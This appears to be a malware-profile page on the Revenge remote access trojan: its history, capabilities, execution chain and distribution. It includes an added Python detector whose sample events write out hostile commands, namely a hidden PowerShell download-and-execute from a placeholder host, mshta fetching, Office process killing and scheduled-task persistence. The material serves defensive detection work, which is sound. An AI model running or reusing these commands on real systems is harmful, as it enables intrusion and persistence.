Revenge

Revenge was one of the most popular remote access trojans in use in 2019, when it was featured in a large malicious campaign named “Aggah”. This malware can take remote control of infected machines and spy on the victims.

Type: Trojan
Origin: Unknown
First seen: 1 January, 2016
Last seen: 25 January, 2023
Global rank: 35
Week rank: 27
Month rank: 30
IOCs: 5429

What is Revenge Malware?

Revenge belongs to the class of Remote Access Trojans, which means that attackers usually use it to control infected PCs remotely or to spy on users by monitoring keystrokes and even the computer's surroundings through remote webcam and microphone access.

Discovered for the first time in 2016, Revenge RAT continues to be a threat to the present day, with a big spike in popularity observed in 2019, when the malware was seen targeting corporations and government structures all around the world in a massive malicious campaign codenamed “Aggah”. Thanks to a large variety of distribution methods similar to those of ransomware, a robust core feature-set, and solid persistence mechanisms, Revenge has become a popular choice for cybercriminals. The popularity of this RAT was further aided by its open-source nature – anybody can freely download Revenge on underground hacking forums and employ it in their own campaigns.

General description of Revenge

The Revenge RAT was first observed in the wild in June 2016, when it was released by a user with the nickname Napoleon – an Arabic-speaking member of the underground hacking community.

The initial version of this malware was a simple malicious program that offered little, if any, code obfuscation and was mainly used by other Arabic-speaking cybercriminals. Despite the simplicity of the malware, at the time only one out of 54 VirusTotal scanners could pick up the malicious nature of the Revenge code, which puzzled researchers given the lack of anti-analysis techniques.

The creator used Visual Basic to develop this RAT and personally admitted that the malware was very bare-bones at the time of its initial release – providing only the most basic functions and definitely losing to competitors in terms of core feature-set. According to Napoleon, this explained why Revenge was available free of charge.

Two months after the initial release, a new version, v0.2, was issued by the author on a more popular hacking forum, this time with more features but still offered completely free of charge. Since then Revenge has evolved even further, and today it offers cybercriminals a wide range of capabilities, including remote alteration of files and the registry on an infected machine, access to memory, processes, and services, as well as access to connected devices such as keyboards, webcams, and mice, allowing this malware to record the actions of its victims and collect information like banking credentials and social account data.

The core malicious feature-set was not the only thing that evolved over the course of the Revenge lifetime. Improvements in distribution and persistence made this threat truly a force to be reckoned with. In some campaigns, scripts were executed from the HTML of a custom Blogspot [com] page.

Revenge malware analysis

A video recorded in the ANY.RUN malware hunting service allows us to take a look at the execution of this malware as it unfolds, as it does for other malicious programs like ransomware.

Figure 1: Displays the lifecycle of Revenge in a visual form. A process graph generated by ANY.RUN.

Figure 2: Shows a customizable text report generated by the ANY.RUN malware analysis service, which allows diving deeper into the details of the Revenge execution process.

Revenge execution process

The first steps of Revenge trojan execution may vary depending on how it made its way onto a victim's computer. The most common initial infiltration vector is the use of Mshta.exe to download the payload or to execute it directly from a URL. After the payload is delivered to the infected machine, Mshta.exe changes the autorun value in the registry and starts three processes: cmd.exe, powershell.exe and schtasks.exe. It starts cmd.exe to kill processes from a list; in the given example, processes from the Microsoft Office suite were targeted. Powershell.exe is launched to download the main payload. In turn, schtasks.exe is launched to create a scheduled task that gives Revenge persistence on the infected system. After all these steps, the malware is ready to execute commands from C2 servers.
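The process chain described above (mshta.exe spawning cmd.exe, powershell.exe and schtasks.exe) is a detection opportunity. The following Python is an added example, not ANY.RUN's code: it walks a set of constructed process-creation events (the event layout, PIDs and command lines are assumptions for this example) and flags every mshta.exe process that spawns that combination of children, annotating what each child appears to do.

```python
"""Detection logic for the mshta.exe -> cmd/powershell/schtasks chain the page
describes.  Event layout and sample events are constructed for this example."""
from collections import defaultdict

# Child images the page names as spawned by mshta.exe during Revenge execution
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "schtasks.exe"}

SAMPLE_EVENTS = [  # constructed process-creation events, not real telemetry
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "mshta.exe",
     "cmdline": "mshta.exe http://PLACEHOLDER.invalid/stage1.hta"},
    {"pid": 201, "ppid": 200, "image": "cmd.exe",
     "cmdline": "cmd.exe /c taskkill /f /im winword.exe /im excel.exe"},
    {"pid": 202, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden IEX (New-Object Net.WebClient)"
                ".DownloadString('http://PLACEHOLDER.invalid/p')"},
    {"pid": 203, "ppid": 200, "image": "schtasks.exe",
     "cmdline": "schtasks.exe /create /sc minute /mo 60 /tn Upd /tr mshta.exe"},
    # benign mshta.exe use with a single harmless child: must not be flagged
    {"pid": 300, "ppid": 100, "image": "mshta.exe", "cmdline": "mshta.exe C:\\app\\help.hta"},
    {"pid": 301, "ppid": 300, "image": "cmd.exe", "cmdline": "cmd.exe /c echo hi"},
]

def find_mshta_chains(events, min_children=2):
    """Return one finding per mshta.exe process that spawns at least
    `min_children` distinct images from SUSPICIOUS_CHILDREN, annotating what
    each child does (process killing, payload download, task persistence)."""
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if e["image"].lower() != "mshta.exe":
            continue
        hits = [c for c in children[e["pid"]] if c["image"].lower() in SUSPICIOUS_CHILDREN]
        images = sorted({c["image"].lower() for c in hits})
        if len(images) < min_children:
            continue
        notes = []
        for c in hits:
            img, cl = c["image"].lower(), c["cmdline"].lower()
            if img == "cmd.exe" and "taskkill" in cl:
                notes.append("process killing")
            elif img == "powershell.exe" and ("downloadstring" in cl or "invoke-webrequest" in cl):
                notes.append("payload download")
            elif img == "schtasks.exe" and "/create" in cl:
                notes.append("scheduled-task persistence")
        findings.append({"mshta_pid": e["pid"], "children": images, "notes": notes})
    return findings
```

Run against real EDR or Sysmon event-ID-1 telemetry, the same parent/child walk applies; the annotations are heuristics and should be tuned to the environment.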

How to avoid infection by Revenge?

The best line of defense against threats like Revenge RAT is to keep a security product installed and kept up to date. One should not disable native Windows security features, should regularly update the OS, and should adhere to the best security practices for staying safe online.

As such, it is advised to stay clear of downloading email attachments from unknown senders and to never enable macros in Microsoft Office when prompted to do so by a file downloaded from a suspicious email. The same advice applies to other threats like Glupteba and Smoke Loader.

Distribution of Revenge

Revenge has been seen being distributed in a variety of ways, much like ransomware, some of which are potentially more effective than others. For example, Revenge is known to infect PCs through malicious email attachments and corrupted ads on compromised websites.

Most commonly, once delivered in a Microsoft Office file that the potential victim downloaded and opened, Revenge uses macros to connect to an outside domain, sometimes hidden on a web page, from which additional scripts and content are downloaded until the actual malware is installed on the PC.

How to detect Revenge RAT using ANY.RUN?

Analysts can get information about which MITRE ATT&CK™ MATRIX techniques were applied by the malware. Just click on the "ATT&CK™ MATRIX" button.

Figure 3: Revenge MITRE ATT&CK MATRIX techniques

Conclusion

Revenge is no slouch when it comes to Remote Banking Trojans. It began its lifespan as a simplistic piece of malware, much like early ransomware, without anti-analysis features, but has evolved to become a capable and persistent trojan used in massive attacks in Europe, North America, Asia, and the Middle East.

The popularity of this malware is due not only to its robust feature-set but also to its ready availability, since Revenge can be downloaded for free from a number of underground communities.

Professionals can establish a secure cyber defense against Revenge and similar RATs, and secure their corporate or government networks, by reverse engineering and studying a threat using malware hunting services like ANY.RUN.

IOCs

